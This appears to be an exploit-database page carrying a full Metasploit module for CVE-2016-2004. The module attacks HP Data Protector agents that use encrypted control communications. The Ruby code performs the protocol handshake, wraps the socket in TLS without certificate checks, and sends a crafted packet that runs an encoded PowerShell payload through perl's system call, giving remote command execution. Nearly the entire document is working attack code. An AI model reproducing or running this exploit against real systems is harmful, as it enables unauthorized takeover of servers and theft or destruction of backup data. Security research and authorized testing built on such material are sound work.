Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)

2016-05-31 03:05:14

# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell

def initialize(info={})
super(update_info(info,
'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
'Description' => %q{
This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
},
'License' => MSF_LICENSE,
'Author' => [ 'Ian Lovering' ],
'References' =>
[
[ 'CVE', '2016-2004' ],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'RPORT' => 5555
},
'Privileged' => false,
'DisclosureDate' => "Apr 18 2016",
'DefaultTarget' => 0))
end

def check
# For the check command
connect
sock.put(rand_text_alpha_upper(64))
response = sock.get_once(-1)
disconnect

if response.nil?
return Exploit::CheckCode::Safe
end

service_version = Rex::Text.to_ascii(response).chop.chomp

if service_version =~ /HP Data Protector/
print_status(service_version)
return Exploit::CheckCode::Detected
end

Exploit::CheckCode::Safe

end

def generate_dp_payload

command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ remove_comspec: true, encode_final_payload: true })

payload =
"\x32\x00\x01\x01\x01\x01\x01\x01" +
"\x00\x01\x00\x01\x00\x01\x00\x01" +
"\x01\x00\x20\x32\x38\x00\x5c\x70" +
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
"\x20\x2d\x65\x73\x79\x73\x74\x65" +
"\x6d('#{command}')\x00"

payload_length = [payload.length].pack('N')

return payload_length + payload
end

def exploit
# Main function
encryption_init_data =
"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"

print_status("Initiating connection")

# Open connection
connect

# Send init data
sock.put(encryption_init_data)
begin
buf = sock.get_once
rescue ::EOFError
end

print_status("Establishing encrypted channel")

# Create TLS / SSL context
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

sock.sslctx.options = OpenSSL::SSL::OP_ALL

# Enable TLS / SSL
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect

print_status("Sending payload")

# Send payload
sock.put(generate_dp_payload(), {timeout: 5})

# Close socket
disconnect

print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
end

end

Fixes

No fixes

In order to submit a new fix you need to be registered.